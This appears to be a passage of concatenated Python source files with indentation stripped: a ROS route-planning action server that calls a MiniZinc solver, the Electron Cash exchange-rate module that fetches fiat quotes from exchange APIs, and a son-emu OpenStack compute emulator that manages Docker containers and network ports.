# create messages that are used to publish feedback/result
# _feedback = offload.msg.FibonacciFeedback()
# _result = offload.msg.FibonacciResult()
def __init__(self, name):
self._action_name = name
self._as = actionlib.ActionServer(self._action_name, offload.msg.RoutePlanAction, goal_cb=self.goal_cb, auto_start = False)
self._as.start()
def goal_cb(self, goalHandle):
goalHandle.set_accepted()
rospy.loginfo("Accepted new goal")
def updateStatus(orderNumber):
feedback = offload.msg.RoutePlanActionFeedback()
#rospy.loginfo("Attributes: %s", vars(feedback))
# feedback.currentOrder = orderNumber
# goalHandle.publish_feedback(feedback)
def completed(finalResult):
status = goalHandle.get_goal_status().status
#updateStatus(sequence)
result = offload.msg.RoutePlanResult()
result.result = finalResult
if status == actionlib.GoalStatus.ACTIVE:
goalHandle.set_succeeded(result)
elif status == actionlib.GoalStatus.PREEMPTED:
goalHandle.set_preempted(result)
else:
goalHandle.set_canceled(result)
def findShortestRoute(goalHandle, statusCB, doneCB):
start = time()
goal = goalHandle.get_goal()
rospy.loginfo('%s: Calculating shortest path from (%i,%i) to (%i,%i)' % (self._action_name, goal.cX, goal.cY, goal.tX, goal.tY))
subprocess.call("mzn2fzn /home/ubuntu/route-finder-cp/route-finder.mzn /home/ubuntu/route-finder-cp/data.dzn -D\"steps=%d;cX=%d;cY=%d;tX=%d;tY=%d\" -o %f.fzn"%(goal.steps, goal.cX, goal.cY, goal.tX, goal.tY, start), shell=True)
result = subprocess.check_output("fzn-gecode -p 1 %f.fzn"%(start),shell=True)
end = time()
rospy.loginfo('%s: Calculating shortest path from (%i,%i) to (%i,%i) in %d seconds' % (self._action_name, goal.cX, goal.cY, goal.tX, goal.tY, end-start))
doneCB(result)
Thread(target=findShortestRoute, args=(goalHandle, updateStatus, completed)).start()
if __name__ == '__main__':
#rospy.init_node('fibonacci')
rospy.init_node('route_planner_' + socket.gethostname())
server = RoutePlanningProgramExecutor(rospy.get_name())
rospy.spin()
|
exchange_rate.py
|
from datetime import datetime
import inspect
import requests
import sys
from threading import Thread
import time
import traceback
import csv
from decimal import Decimal
from bitcoin import COIN
from i18n import _
from util import PrintError, ThreadJob
from util import format_satoshis
# See https://en.wikipedia.org/wiki/ISO_4217
CCY_PRECISIONS = {'BHD': 3, 'BIF': 0, 'BYR': 0, 'CLF': 4, 'CLP': 0,
'CVE': 0, 'DJF': 0, 'GNF': 0, 'IQD': 3, 'ISK': 0,
'JOD': 3, 'JPY': 0, 'KMF': 0, 'KRW': 0, 'KWD': 3,
'LYD': 3, 'MGA': 1, 'MRO': 1, 'OMR': 3, 'PYG': 0,
'RWF': 0, 'TND': 3, 'UGX': 0, 'UYI': 0, 'VND': 0,
'VUV': 0, 'XAF': 0, 'XAU': 4, 'XOF': 0, 'XPF': 0}
class ExchangeBase(PrintError):
def __init__(self, on_quotes, on_history):
self.history = {}
self.quotes = {}
self.on_quotes = on_quotes
self.on_history = on_history
def get_json(self, site, get_string):
# APIs must have https
url = ''.join(['https://', site, get_string])
response = requests.request('GET', url, headers={'User-Agent' : 'Electron Cash'})
return response.json()
def get_csv(self, site, get_string):
url = ''.join(['https://', site, get_string])
response = requests.request('GET', url, headers={'User-Agent' : 'Electron Cash'})
reader = csv.DictReader(response.content.split('\n'))
return list(reader)
def name(self):
return self.__class__.__name__
def update_safe(self, ccy):
try:
self.print_error("getting fx quotes for", ccy)
self.quotes = self.get_rates(ccy)
self.print_error("received fx quotes")
except BaseException as e:
self.print_error("failed fx quotes:", e)
self.on_quotes()
def update(self, ccy):
t = Thread(target=self.update_safe, args=(ccy,))
t.setDaemon(True)
t.start()
def get_historical_rates_safe(self, ccy):
try:
self.print_error("requesting fx history for", ccy)
self.history[ccy] = self.historical_rates(ccy)
self.print_error("received fx history for", ccy)
self.on_history()
except BaseException as e:
self.print_error("failed fx history:", e)
def get_historical_rates(self, ccy):
result = self.history.get(ccy)
if not result and ccy in self.history_ccys():
t = Thread(target=self.get_historical_rates_safe, args=(ccy,))
t.setDaemon(True)
t.start()
return result
def history_ccys(self):
return []
def historical_rate(self, ccy, d_t):
return self.history.get(ccy, {}).get(d_t.strftime('%Y-%m-%d'))
def get_currencies(self):
rates = self.get_rates('')
return sorted([str(a) for (a, b) in rates.iteritems() if b is not None and len(a)==3])
class BitcoinAverage(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('apiv2.bitcoinaverage.com', '/indices/global/ticker/short')
return dict([(r.replace("BTC", ""), Decimal(json[r]['last']))
for r in json if r != 'timestamp'])
def history_ccys(self):
return ['AUD', 'BRL', 'CAD', 'CHF', 'CNY', 'EUR', 'GBP', 'IDR', 'ILS',
'MXN', 'NOK', 'NZD', 'PLN', 'RON', 'RUB', 'SEK', 'SGD', 'USD',
'ZAR']
def historical_rates(self, ccy):
history = self.get_csv('apiv2.bitcoinaverage.com',
"/indices/global/history/BTC%s?period=alltime&format=csv" % ccy)
return dict([(h['DateTime'][:10], h['Average'])
for h in history])
class Bitcointoyou(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('bitcointoyou.com', "/API/ticker.aspx")
return {'BRL': Decimal(json['ticker']['last'])}
def history_ccys(self):
return ['BRL']
class BitcoinVenezuela(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.bitcoinvenezuela.com', '/')
rates = [(r, json['BTC'][r]) for r in json['BTC']
if json['BTC'][r] is not None] # Giving NULL for LTC
return dict(rates)
def history_ccys(self):
return ['ARS', 'EUR', 'USD', 'VEF']
def historical_rates(self, ccy):
return self.get_json('api.bitcoinvenezuela.com',
"/historical/index.php?coin=BTC")[ccy +'_BTC']
class Bitmarket(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.bitmarket.pl', '/json/BTCPLN/ticker.json')
return {'PLN': Decimal(json['last'])}
class BitPay(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('bitpay.com', '/api/rates')
return dict([(r['code'], Decimal(r['rate'])) for r in json])
class Bitso(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.bitso.com', '/v2/ticker')
return {'MXN': Decimal(json['last'])}
class BitStamp(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.bitstamp.net', '/api/ticker/')
return {'USD': Decimal(json['last'])}
class Bitvalor(ExchangeBase):
def get_rates(self,ccy):
json = self.get_json('api.bitvalor.com', '/v1/ticker.json')
return {'BRL': Decimal(json['ticker_1h']['total']['last'])}
class BlockchainInfo(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('blockchain.info', '/ticker')
return dict([(r, Decimal(json[r]['15m'])) for r in json])
class BTCChina(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('data.btcchina.com', '/data/ticker')
return {'CNY': Decimal(json['ticker']['last'])}
class BTCe(ExchangeBase):
def get_rates(self, ccy):
json_eur = self.get_json('btc-e.nz', '/api/3/ticker/btc_eur')
json_rub = self.get_json('btc-e.nz', '/api/3/ticker/btc_rur')
json_usd = self.get_json('btc-e.nz', '/api/3/ticker/btc_usd')
return {'EUR': Decimal(json_eur['btc_eur']['last']),
'RUB': Decimal(json_rub['btc_rur']['last']),
'USD': Decimal(json_usd['btc_usd']['last'])}
class BTCParalelo(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('btcparalelo.com', '/api/price')
return {'VEF': Decimal(json['price'])}
class Coinbase(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('coinbase.com',
'/api/v1/currencies/exchange_rates')
return dict([(r[7:].upper(), Decimal(json[r]))
for r in json if r.startswith('btc_to_')])
class CoinDesk(ExchangeBase):
def get_rates(self, ccy):
dicts = self.get_json('api.coindesk.com',
'/v1/bpi/supported-currencies.json')
json = self.get_json('api.coindesk.com',
'/v1/bpi/currentprice/%s.json' % ccy)
ccys = [d['currency'] for d in dicts]
result = dict.fromkeys(ccys)
result[ccy] = Decimal(json['bpi'][ccy]['rate_float'])
return result
def history_starts(self):
return { 'USD': '2012-11-30' }
def history_ccys(self):
return self.history_starts().keys()
def historical_rates(self, ccy):
start = self.history_starts()[ccy]
end = datetime.today().strftime('%Y-%m-%d')
# Note ?currency and ?index don't work as documented. Sigh.
query = ('/v1/bpi/historical/close.json?start=%s&end=%s'
% (start, end))
json = self.get_json('api.coindesk.com', query)
return json['bpi']
class Coinsecure(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.coinsecure.in', '/v0/noauth/newticker')
return {'INR': Decimal(json['lastprice'] / 100.0 )}
class Foxbit(ExchangeBase):
def get_rates(self,ccy):
json = self.get_json('api.bitvalor.com', '/v1/ticker.json')
return {'BRL': Decimal(json['ticker_1h']['exchanges']['FOX']['last'])}
class itBit(ExchangeBase):
def get_rates(self, ccy):
ccys = ['USD', 'EUR', 'SGD']
json = self.get_json('api.itbit.com', '/v1/markets/XBT%s/ticker' % ccy)
result = dict.fromkeys(ccys)
if ccy in ccys:
result[ccy] = Decimal(json['lastPrice'])
return result
class Kraken(ExchangeBase):
def get_rates(self, ccy):
ccys = ['EUR', 'USD']
pairs = ['BCH%s' % c for c in ccys]
json = self.get_json('api.kraken.com',
'/0/public/Ticker?pair=%s' % ','.join(pairs))
return dict((k[-3:], Decimal(float(v['c'][0])))
for k, v in json['result'].items())
class LocalBitcoins(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('localbitcoins.com',
'/bitcoinaverage/ticker-all-currencies/')
return dict([(r, Decimal(json[r]['rates']['last'])) for r in json])
class CoinFloor(ExchangeBase):
# CoinFloor API only supports GBP on public API
def get_rates(self, ccy):
json = self.get_json('webapi.coinfloor.co.uk:8090/bist/BCH/GBP', '/ticker/')
return {'GBP': Decimal(json['last'])}
class CEXIO(ExchangeBase):
# Cex.io supports GBP, USD, EUR, BTC
def get_rates(self, ccy):
json = self.get_json('cex.io', '/api/ticker/BCH/%s' % ccy)
return { ccy : Decimal(json['last'])}
class BtcMarkets(ExchangeBase):
# BtcMarkets - Australian Exchange - AUD
def get_rates(self, ccy):
json = self.get_json('api.btcmarkets.net', '/market/BCH/%s/tick' % ccy)
return { ccy : Decimal(json['lastPrice'])}
class MercadoBitcoin(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.bitvalor.com', '/v1/ticker.json')
return {'BRL': Decimal(json['ticker_1h']['exchanges']['MBT']['last'])}
class NegocieCoins(ExchangeBase):
def get_rates(self,ccy):
json = self.get_json('api.bitvalor.com', '/v1/ticker.json')
return {'BRL': Decimal(json['ticker_1h']['exchanges']['NEG']['last'])}
def history_ccys(self):
return ['BRL']
class Unocoin(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.unocoin.com', 'trade?buy')
return {'INR': Decimal(json)}
class Winkdex(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('winkdex.com', '/api/v0/price')
return {'USD': Decimal(json['price'] / 100.0)}
def history_ccys(self):
return ['USD']
def historical_rates(self, ccy):
json = self.get_json('winkdex.com',
"/api/v0/series?start_time=1342915200")
history = json['series'][0]['results']
return dict([(h['timestamp'][:10], h['price'] / 100.0)
for h in history])
def dictinvert(d):
inv = {}
for k, vlist in d.iteritems():
for v in vlist:
keys = inv.setdefault(v, [])
keys.append(k)
return inv
def get_exchanges_and_currencies():
import os, json
path = os.path.join(os.path.dirname(__file__), 'currencies.json')
try:
return json.loads(open(path, 'r').read())
except:
pass
d = {}
is_exchange = lambda obj: (inspect.isclass(obj)
and issubclass(obj, ExchangeBase)
and obj != ExchangeBase)
exchanges = dict(inspect.getmembers(sys.modules[__name__], is_exchange))
for name, klass in exchanges.items():
exchange = klass(None, None)
try:
d[name] = exchange.get_currencies()
except:
continue
with open(path, 'w') as f:
f.write(json.dumps(d, indent=4, sort_keys=True))
return d
CURRENCIES = get_exchanges_and_currencies()
def get_exchanges_by_ccy(history=True):
if not history:
return dictinvert(CURRENCIES)
d = {}
exchanges = CURRENCIES.keys()
for name in exchanges:
klass = globals()[name]
exchange = klass(None, None)
d[name] = exchange.history_ccys()
return dictinvert(d)
class FxThread(ThreadJob):
def __init__(self, config, network):
self.config = config
self.network = network
self.ccy = self.get_currency()
self.history_used_spot = False
self.ccy_combo = None
self.hist_checkbox = None
self.set_exchange(self.config_exchange())
def get_currencies(self, h):
d = get_exchanges_by_ccy(h)
return sorted(d.keys())
def get_exchanges_by_ccy(self, ccy, h):
d = get_exchanges_by_ccy(h)
return d.get(ccy, [])
def ccy_amount_str(self, amount, commas):
prec = CCY_PRECISIONS.get(self.ccy, 2)
fmt_str = "{:%s.%df}" % ("," if commas else "", max(0, prec))
return fmt_str.format(round(amount, prec))
def run(self):
# This runs from the plugins thread which catches exceptions
if self.is_enabled():
if self.timeout ==0 and self.show_history():
self.exchange.get_historical_rates(self.ccy)
if self.timeout <= time.time():
self.timeout = time.time() + 150
self.exchange.update(self.ccy)
def is_enabled(self):
return bool(self.config.get('use_exchange_rate'))
def set_enabled(self, b):
return self.config.set_key('use_exchange_rate', bool(b))
def get_history_config(self):
return bool(self.config.get('history_rates'))
def set_history_config(self, b):
self.config.set_key('history_rates', bool(b))
def get_currency(self):
'''Use when dynamic fetching is needed'''
return self.config.get("currency", "EUR")
def config_exchange(self):
return self.config.get('use_exchange', 'Kraken')
def show_history(self):
return self.is_enabled() and self.get_history_config() and self.ccy in self.exchange.history_ccys()
def set_currency(self, ccy):
self.ccy = ccy
self.config.set_key('currency', ccy, True)
self.timeout = 0 # Because self.ccy changes
self.on_quotes()
def set_exchange(self, name):
class_ = globals().get(name, Kraken)
self.print_error("using exchange", name)
if self.config_exchange() != name:
self.config.set_key('use_exchange', name, True)
self.exchange = class_(self.on_quotes, self.on_history)
# A new exchange means new fx quotes, initially empty. Force
# a quote refresh
self.timeout = 0
def on_quotes(self):
self.network.trigger_callback('on_quotes')
def on_history(self):
self.network.trigger_callback('on_history')
def exchange_rate(self):
'''Returns None, or the exchange rate as a Decimal'''
rate = self.exchange.quotes.get(self.ccy)
if rate:
return Decimal(rate)
def format_amount_and_units(self, btc_balance):
rate = self.exchange_rate()
return '' if rate is None else "%s %s" % (self.value_str(btc_balance, rate), self.ccy)
def get_fiat_status_text(self, btc_balance, base_unit, decimal_point):
rate = self.exchange_rate()
return _(" (No FX rate available)") if rate is None else " 1 %s~%s %s" % (base_unit,
self.value_str(COIN / (10**(8 - decimal_point)), rate), self.ccy)
def value_str(self, satoshis, rate):
if satoshis is None: # Can happen with incomplete history
return _("Unknown")
if rate:
value = Decimal(satoshis) / COIN * Decimal(rate)
return "%s" % (self.ccy_amount_str(value, True))
return _("No data")
def history_rate(self, d_t):
rate = self.exchange.historical_rate(self.ccy, d_t)
# Frequently there is no rate for today, until tomorrow :)
# Use spot quotes in that case
if rate is None and (datetime.today().date() - d_t.date()).days <= 2:
rate = self.exchange.quotes.get(self.ccy)
self.history_used_spot = True
return rate
def historical_value_str(self, satoshis, d_t):
rate = self.history_rate(d_t)
return self.value_str(satoshis, rate)
|
compute.py
|
from mininet.link import Link
from resources import *
from docker import DockerClient
import logging
import threading
import uuid
import time
import ip_handler as IP
class HeatApiStackInvalidException(Exception):
"""
Exception thrown when a submitted stack is invalid.
"""
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class OpenstackCompute(object):
"""
This class is a datacenter specific compute object that tracks all containers that are running in a datacenter,
as well as networks and configured ports.
It has some stack dependet logic and can check if a received stack is valid.
It also handles start and stop of containers.
"""
def __init__(self):
self.dc = None
self.stacks = dict()
self.computeUnits = dict()
self.routers = dict()
self.flavors = dict()
self._images = dict()
self.nets = dict()
self.ports = dict()
self.compute_nets = dict()
self.dcli = DockerClient(base_url='unix://var/run/docker.sock')
@property
def images(self):
"""
Updates the known images. Asks the docker daemon for a list of all known images and returns
the new dictionary.
:return: Returns the new image dictionary.
:rtype: ``dict``
"""
for image in self.dcli.images.list():
if len(image.tags) > 0:
for t in image.tags:
t = t.replace(":latest", "") # only use short tag names for OSM compatibility
if t not in self._images:
self._images[t] = Image(t)
return self._images
def add_stack(self, stack):
"""
Adds a new stack to the compute node.
:param stack: Stack dictionary.
:type stack: :class:`heat.resources.stack`
"""
if not self.check_stack(stack):
self.clean_broken_stack(stack)
raise HeatApiStackInvalidException("Stack did not pass validity checks")
self.stacks[stack.id] = stack
def clean_broken_stack(self, stack):
for port in stack.ports.values():
if port.id in self.ports:
del self.ports[port.id]
for server in stack.servers.values():
if server.id in self.computeUnits:
del self.computeUnits[server.id]
for net in stack.nets.values():
if net.id in self.nets:
del self.nets[net.id]
def check_stack(self, stack):
"""
Checks all dependencies of all servers, ports and routers and their most important parameters.
:param stack: A reference of the stack that should be checked.
:type stack: :class:`heat.resources.stack`
:return: * *True*: If the stack is completely fine.
* *False*: Else
:rtype: ``bool``
"""
everything_ok = True
for server in stack.servers.values():
for port_name in server.port_names:
if port_name not in stack.ports:
logging.warning("Server %s of stack %s has a port named %s that is not known." %
(server.name, stack.stack_name, port_name))
everything_ok = False
if server.image is None:
logging.warning("Server %s holds no image." % (server.name))
everything_ok = False
if server.command is None:
logging.warning("Server %s holds no command." % (server.name))
everything_ok = False
for port in stack.ports.values():
if port.net_name not in stack.nets:
logging.warning("Port %s of stack %s has a network named %s that is not known." %
(port.name, stack.stack_name, port.net_name))
everything_ok = False
if port.intf_name is None:
logging.warning("Port %s has no interface name." % (port.name))
everything_ok = False
if port.ip_address is None:
logging.warning("Port %s has no IP address." % (port.name))
everything_ok = False
for router in stack.routers.values():
for subnet_name in router.subnet_names:
found = False
for net in stack.nets.values():
if net.subnet_name == subnet_name:
found = True
break
if not found:
logging.warning("Router %s of stack %s has a network named %s that is not known." %
(router.name, stack.stack_name, subnet_name))
everything_ok = False
return everything_ok
def add_flavor(self, name, cpu, memory, memory_unit, storage, storage_unit):
"""
Adds a flavor to the stack.
:param name: Specifies the name of the flavor.
:type name: ``str``
:param cpu:
:type cpu: ``str``
:param memory:
:type memory: ``str``
:param memory_unit:
:type memory_unit: ``str``
:param storage:
:type storage: ``str``
:param storage_unit:
:type storage_unit: ``str``
"""
flavor = InstanceFlavor(name, cpu, memory, memory_unit, storage, storage_unit)
self.flavors[flavor.name] = flavor
return flavor
def deploy_stack(self, stackid):
"""
Deploys the stack and starts the emulation.
:param stackid: An UUID str of the stack
:type stackid: ``str``
:return: * *False*: If the Datacenter is None
* *True*: Else
:rtype: ``bool``
"""
if self.dc is None:
return False
stack = self.stacks[stackid]
self.update_compute_dicts(stack)
# Create the networks first
for server in stack.servers.values():
self._start_compute(server)
return True
def delete_stack(self, stack_id):
"""
Delete a stack and all its components.
:param stack_id: An UUID str of the stack
:type stack_id: ``str``
:return: * *False*: If the Datacenter is None
* *True*: Else
:rtype: ``bool``
"""
if self.dc is None:
return False
# Stop all servers and their links of this stack
for server in self.stacks[stack_id].servers.values():
self.stop_compute(server)
self.delete_server(server)
for net in self.stacks[stack_id].nets.values():
self.delete_network(net.id)
for port in self.stacks[stack_id].ports.values():
self.delete_port(port.id)
del self.stacks[stack_id]
return True
def update_stack(self, old_stack_id, new_stack):
"""
Determines differences within the old and the new stack and deletes, create or changes only parts that
differ between the two stacks.
:param old_stack_id: The ID of the old stack.
:type old_stack_id: ``str``
:param new_stack: A reference of the new stack.
:type new_stack: :class:`heat.resources.stack`
:return: * *True*: if the old stack could be updated to the new stack without any error.
* *False*: else
:rtype: ``bool``
"""
if old_stack_id not in self.stacks:
return False
old_stack = self.stacks[old_stack_id]
# Update Stack IDs
for server in old_stack.servers.values():
if server.name in new_stack.servers:
new_stack.servers[server.name].id = server.id
for net in old_stack.nets.values():
if net.name in new_stack.nets:
new_stack.nets[net.name].id = net.id
for subnet in new_stack.nets.values():
if subnet.subnet_name == net.subnet_name:
subnet.subnet_id = net.subnet_id
break
for port in old_stack.ports.values():
if port.name in new_stack.ports:
new_stack.ports[port.name].id = port.id
for router in old_stack.routers.values():
if router.name in new_stack.routers:
new_stack.routers[router.name].id = router.id
# Update the compute dicts to now contain the new_stack components
self.update_compute_dicts(new_stack)
self.update_ip_addresses(old_stack, new_stack)
# Update all interface names - after each port has the correct UUID!!
for port in new_stack.ports.values():
port.create_intf_name()
if not self.check_stack(new_stack):
return False
# Remove unnecessary networks
for net in old_stack.nets.values():
if not net.name in new_stack.nets:
self.delete_network(net.id)
# Remove all unnecessary servers
for server in old_stack.servers.values():
if server.name in new_stack.servers:
if not server.compare_attributes(new_stack.servers[server.name]):
self.stop_compute(server)
else:
# Delete unused and changed links
for port_name in server.port_names:
if port_name in old_stack.ports and port_name in new_stack.ports:
if not old_stack.ports.get(port_name) == new_stack.ports.get(port_name):
my_links = self.dc.net.links
for link in my_links:
if str(link.intf1) == old_stack.ports[port_name].intf_name and \
str(link.intf1.ip) == \
old_stack.ports[port_name].ip_address.split('/')[0]:
self._remove_link(server.name, link)
# Add changed link
self._add_link(server.name,
new_stack.ports[port_name].ip_address,
new_stack.ports[port_name].intf_name,
new_stack.ports[port_name].net_name)
break
else:
my_links = self.dc.net.links
for link in my_links:
if str(link.intf1) == old_stack.ports[port_name].intf_name and \
str(link.intf1.ip) == old_stack.ports[port_name].ip_address.split('/')[0]:
self._remove_link(server.name, link)
break
# Create new links
for port_name in new_stack.servers[server.name].port_names:
if port_name not in server.port_names:
self._add_link(server.name,
new_stack.ports[port_name].ip_address,
new_stack.ports[port_name].intf_name,
new_stack.ports[port_name].net_name)
else:
self.stop_compute(server)
# Start all new servers
for server in new_stack.servers.values():
if server.name not in self.dc.containers:
self._start_compute(server)
else:
server.emulator_compute = self.dc.containers.get(server.name)
del self.stacks[old_stack_id]
self.stacks[new_stack.id] = new_stack
return True
def update_ip_addresses(self, old_stack, new_stack):
"""
Updates the subnet and the port IP addresses - which should always be in this order!
:param old_stack: The currently running stack
:type old_stack: :class:`heat.resources.stack`
:param new_stack: The new created stack
:type new_stack: :class:`heat.resources.stack`
"""
self.update_subnet_cidr(old_stack, new_stack)
self.update_port_addresses(old_stack, new_stack)
def update_port_addresses(self, old_stack, new_stack):
"""
Updates the port IP addresses. First resets all issued addresses. Then get all IP addresses from the old
stack and sets them to the same ports in the new stack. Finally all new or changed instances will get new
IP addresses.
:param old_stack: The currently running stack
:type old_stack: :class:`heat.resources.stack`
:param new_stack: The new created stack
:type new_stack: :class:`heat.resources.stack`
"""
for net in new_stack.nets.values():
net.reset_issued_ip_addresses()
for old_port in old_stack.ports.values():
for port in new_stack.ports.values():
if port.compare_attributes(old_port):
for net in new_stack.nets.values():
if net.name == port.net_name:
if net.assign_ip_address(old_port.ip_address, port.name):
port.ip_address = old_port.ip_address
port.mac_address = old_port.mac_address
else:
port.ip_address = net.get_new_ip_address(port.name)
for port in new_stack.ports.values():
for net in new_stack.nets.values():
if port.net_name == net.name and not net.is_my_ip(port.ip_address, port.name):
port.ip_address = net.get_new_ip_address(port.name)
def update_subnet_cidr(self, old_stack, new_stack):
"""
Updates the subnet IP addresses. If the new stack contains subnets from the old stack it will take those
IP addresses. Otherwise it will create new IP addresses for the subnet.
:param old_stack: The currently running stack
:type old_stack: :class:`heat.resources.stack`
:param new_stack: The new created stack
:type new_stack: :class:`heat.resources.stack`
"""
for old_subnet in old_stack.nets.values():
IP.free_cidr(old_subnet.get_cidr(), old_subnet.subnet_id)
for subnet in new_stack.nets.values():
subnet.clear_cidr()
for old_subnet in old_stack.nets.values():
if subnet.subnet_name == old_subnet.subnet_name:
if IP.assign_cidr(old_subnet.get_cidr(), subnet.subnet_id):
subnet.set_cidr(old_subnet.get_cidr())
for subnet in new_stack.nets.values():
if IP.is_cidr_issued(subnet.get_cidr()):
continue
cird = IP.get_new_cidr(subnet.subnet_id)
subnet.set_cidr(cird)
return
def update_compute_dicts(self, stack):
"""
Update and add all stack components tho the compute dictionaries.
:param stack: A stack reference, to get all required components.
:type stack: :class:`heat.resources.stack`
"""
for server in stack.servers.values():
self.computeUnits[server.id] = server
if isinstance(server.flavor, dict):
self.add_flavor(server.flavor['flavorName'],
server.flavor['vcpu'],
server.flavor['ram'], 'MB',
server.flavor['storage'], 'GB')
server.flavor = server.flavor['flavorName']
for router in stack.routers.values():
self.routers[router.id] = router
for net in stack.nets.values():
self.nets[net.id] = net
for port in stack.ports.values():
self.ports[port.id] = port
def _start_compute(self, server):
"""
Starts a new compute object (docker container) inside the emulator.
Should only be called by stack modifications and not directly.
:param server: Specifies the compute resource.
:type server: :class:`heat.resources.server`
"""
logging.debug("Starting new compute resources %s" % server.name)
network = list()
for port_name in server.port_names:
network_dict = dict()
port = self.find_port_by_name_or_id(port_name)
if port is not None:
network_dict['id'] = port.intf_name
network_dict['ip'] = port.ip_address
network_dict[network_dict['id']] = self.find_network_by_name_or_id(port.net_name).name
network.append(network_dict)
self.compute_nets[server.name] = network
c = self.dc.startCompute(server.name, image=server.image, command=server.command,
network=network, flavor_name=server.flavor)
server.emulator_compute = c
for intf in c.intfs.values():
for port_name in server.port_names:
port = self.find_port_by_name_or_id(port_name)
if port is not None:
if intf.name == port.intf_name:
# wait up to one second for the intf to come up
self.timeout_sleep(intf.isUp, 1)
if port.mac_address is not None:
intf.setMAC(port.mac_address)
else:
port.mac_address = intf.MAC()
# Start the real emulator command now as specified in the dockerfile
# ENV SON_EMU_CMD
config = c.dcinfo.get("Config", dict())
env = config.get("Env", list())
for env_var in env:
if "SON_EMU_CMD=" in env_var:
cmd = str(env_var.split("=")[1])
server.son_emu_command = cmd
# execute command in new thread to ensure that GK is not blocked by VNF
t = threading.Thread(target=c.cmdPrint, args=(cmd,))
t.daemon = True
t.start()
def stop_compute(self, server):
"""
Determines which links should be removed before removing the server itself.
:param server: The server that should be removed
:type server: ``heat.resources.server``
"""
logging.debug("Stopping container %s with full name %s" % (server.name, server.full_name))
link_names = list()
for port_name in server.port_names:
link_names.append(self.find_port_by_name_or_id(port_name).intf_name)
my_links = self.dc.net.links
for link in my_links:
if str(link.intf1) in link_names:
# Remove all self created links that connect the server to the main switch
self._remove_link(server.name, link)
# Stop the server and the remaining connection to the datacenter switch
self.dc.stopCompute(server.name)
# Only now delete all its ports and the server itself
for port_name in server.port_names:
self.delete_port(port_name)
self.delete_server(server)
def find_server_by_name_or_id(self, name_or_id):
"""
Tries to find the server by ID and if this does not succeed then tries to find it via name.
:param name_or_id: UUID or name of the server.
:type name_or_id: ``str``
:return: Returns the server reference if it was found or None
:rtype: :class:`heat.resources.server`
"""
if name_or_id in self.computeUnits:
return self.computeUnits[name_or_id]
for server in self.computeUnits.values():
if server.name == name_or_id or server.template_name == name_or_id or server.full_name == name_or_id:
return server
return None
def create_server(self, name, stack_operation=False):
"""
Creates a server with the specified name. Raises an exception when a server with the given name already
exists!
:param name: Name of the new server.
:type name: ``str``
:param stack_operation: Allows the heat parser to create modules without adapting the current emulation.
:type stack_operation: ``bool``
:return: Returns the created server.
:rtype: :class:`heat.resources.server`
"""
if self.find_server_by_name_or_id(name) is not None and not stack_operation:
raise Exception("Server with name %s already exists." % name)
server = Server(name)
server.id = str(uuid.uuid4())
if not stack_operation:
self.computeUnits[server.id] = server
return server
def delete_server(self, server):
"""
Deletes the given server from the stack dictionary and the computeUnits dictionary.
:param server: Reference of the server that should be deleted.
:type server: :class:`heat.resources.server`
:return: * *False*: If the server name is not in the correct format ('datacentername_stackname_servername') \
or when no stack with the correct stackname was found.
* *True*: Else
:rtype: ``bool``
"""
if server is None:
return False
name_parts = server.name.split('_')
if len(name_parts) < 3:
return False
for stack in self.stacks.values():
if stack.stack_name == name_parts[1]:
stack.servers.pop(server.id, None)
if self.computeUnits.pop(server.id, None) is None:
return False
return True
def find_network_by_name_or_id(self, name_or_id):
"""
Tries to find the network by ID and if this does not succeed then tries to find it via name.
:param name_or_id: UUID or name of the network.
:type name_or_id: ``str``
:return: Returns the network reference if it was found or None
:rtype: :class:`heat.resources.net`
"""
if name_or_id in self.nets:
return self.nets[name_or_id]
for net in self.nets.values():
if net.name == name_or_id:
return net
return None
def create_network(self, name, stack_operation=False):
"""
Creates a new network with the given name. Raises an exception when a network with the given name already
exists!
:param name: Name of the new network.
:type name: ``str``
:param stack_operation: Allows the heat parser to create modules without adapting the current emulation.
:type stack_operation: ``bool``
:return: :class:`heat.resources.net`
"""
logging.debug("Creating network with name %s" % name)
if self.find_network_by_name_or_id(name) is not None and not stack_operation:
logging.warning("Creating network with name %s failed, as it already exists" % name)
raise Exception("Network with name %s already exists." % name)
network = Net(name)
network.id = str(uuid.uuid4())
if not stack_operation:
self.nets[network.id] = network
return network
def delete_network(self, name_or_id):
"""
Deletes the given network.
:param name_or_id: Name or UUID of the network.
:type name_or_id: ``str``
"""
net = self.find_network_by_name_or_id(name_or_id)
if net is None:
raise Exception("Network with name or id %s does not exists." % name_or_id)
for stack in self.stacks.values():
stack.nets.pop(net.name, None)
self.nets.pop(net.id, None)
def create_port(self, name, stack_operation=False):
"""
Creates a new port with the given name. Raises an exception when a port with the given name already
exists!
:param name: Name of the new port.
:type name: ``str``
:param stack_operation: Allows the heat parser to create modules without adapting the current emulation.
:type stack_operation: ``bool``
:return: Returns the created port.
:rtype: :class:`heat.resources.port`
"""
port = self.find_port_by_name_or_id(name)
if port is not None and not stack_operation:
logging.warning("Creating port with name %s failed, as it already exists" % name)
raise Exception("Port with name %s already exists." % name)
logging.debug("Creating port with name %s" % name)
port = Port(name)
if not stack_operation:
self.ports[port.id] = port
port.create_intf_name()
return port
def find_port_by_name_or_id(self, name_or_id):
"""
Tries to find the port by ID and if this does not succeed then tries to find it via name.
:param name_or_id: UUID or name of the network.
:type name_or_id: ``str``
:return: Returns the port reference if it was found or None
:rtype: :class:`heat.resources.port`
"""
if name_or_id in self.ports:
return self.ports[name_or_id]
for port in self.ports.values():
if port.name == name_or_id or port.template_name == name_or_id:
return port
return None
def delete_port(self, name_or_id):
"""
Deletes the given port. Raises an exception when the port was not found!
:param name_or_id: UUID or name of the port.
:type name_or_id: ``str``
"""
